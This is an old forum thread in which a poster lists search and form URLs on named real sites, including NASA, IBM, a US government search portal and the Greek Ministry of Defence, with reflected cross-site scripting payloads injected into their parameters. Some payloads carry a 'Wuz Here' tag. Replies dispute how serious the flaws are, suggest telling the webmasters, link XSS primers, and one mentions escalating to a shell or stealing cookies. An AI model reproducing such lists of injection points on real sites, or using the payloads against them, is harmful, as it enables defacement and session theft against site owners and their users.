Xss!!!!!!

[dr_insane_]

Here there are some Vulnerable sites i found:

We start with NASA.GOV

http://search.nasa.gov/nasasearch/se...ubmitsearch.x=<script>alert("m")</script>&submitsearch.y=<script>alert("m")</script>

http://search.nasa.gov/nasasearch/br...gory+Search.x=<script>alert("m")</script>&Category+Search.y=<script>alert("m")</script>

And we go on with Fbi:

hmmm what is this?

http://www.firstgov.gov/fgsearch/ind...ubmit=+Search+


w0w! INTERNAL server error

http://www.firstgov.gov/fgsearch/index.jsp?dom=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

http://www.firstgov.gov/fgsearch/index.jsp?dom0=<script>alert("m")</script>&mw0=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%3E&rn=218&in0=domain&parsed=true&Submit=Go&domain=fbi.gov

Ibm is also vulnerable:

http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

www.opera.com
In the search engine write: <script>alert("m")</script>

http://www.business.com/search/rslt_...=&bdcf=&vt=all

http://www.searchengineworld.com/
--Write <script>alert("m")</script> in the e-mail address field


http://www.crackfound.com/engine.cgi...9%3C/script%3E

http://www.thebugs.ws/search.php?q=%...9%3C/script%3E

http://www.ibm.com/Search?v=11&lang=...t%3E&Search.x=<script>alert("m")</script>&Search.y=<script>alert("m")</script>

http://www.anubis.gr/Users/default.a...er&act=newUser

http://www.pcmaster.gr/forum/default.asp?Action=Search


Ministry of defence in Greece:
http://www.mod.mil.gr/contact/all_ma...html?seclevel=<script>alert("m")</script>

Hol (hellas on line ISP):

http://search.hol.gr/advanced.asp?advanced=<script>alert("insane")</script)&c2=<script>alert("insane")</script)&o2=<script>alert("Dr_insane%20Wuz%20Here")</script)&ct=<script>alert("Dr_insane%20Wuz%20Here")</script)&q1=%3Cscript%3Ealert%28%22m%22%29%3C%2Fscript%29&searchlang=&q2=<script>alert("m")</script)&so=<script>alert("Dr_insane%20Wuz%20Here")</script)

http://search.hol.gr/search.asp?ct=G...o.x=14&Go.y=16


http://www.linuxfreaks.gr/

http://www.findlink.gr/searching.asp?key=<script>alert("m")</script>&logic=any
http://search.pathfinder.gr/search?q...ipt%3E&tab=web

http://www.anazitisis.gr/cgi-bin/hts....x=5&search.y=<script>alert("m")</script>

http://www.ditto.com/searchResults.a...t%3E&search.x=<script>alert("m")</script>&search.y=<script>alert("m")</script>

http://promosearch.atomz.com/search/...8112&submit.x=<script>alert("m")</script>&submit.y=<script>alert("m")</script>

http://www.askjeeves.com ****

http://www.mixer.gr/cgi-bin/mxmeta?q...3C%2Fscript%3E
http://www.robby.gr/search.rsp?searc...615407&parent=

EOF

/dr_insane
dr_insane at pathfinder.gr

[MemorY]

why dont you contact some of their webmasters and tell them their vulnebarities .....

[avdven]

Really quick, what makes you classify those as vulnerabilities? Yes, the these servers may contain vulnerabilities, but none of the links you posted are exploitable vulnerabilities. You're just passing a specific command into the search fields to give an internal server error. Doesn't appear to be anything special to me...

AJ

[the_JinX]

some background info on XSS and what you can do with it..

http://hotwired.lycos.com/webmonkey/00/18/index3a.html
http://www.idefense.com/XSS.html
http://www.cgisecurity.com/articles/xss-faq.shtml

source: http://www.google.com/search?q=xss&ie=UTF-8&oe=UTF-8

so yes.. it does mean they might be exploitable.. but it doesn't mean they are !!

[CraZy_AhmaD]

well it depends of what you write in your script...
you can also try in some asp/php forums or search engines to add more powerfull commands and even get yourself a shell in some method...

[ammo]

Do these urls require authenticated sessions to get to them? Is there anything of value protected by these sessions? Otherwise, I don't see much point in stealing cookies (which is pretty much all you can do with javascript xss) from search pages...

Of course if the site was parsing asp or php or someother server side scripting this might be bad indeed...

Ammo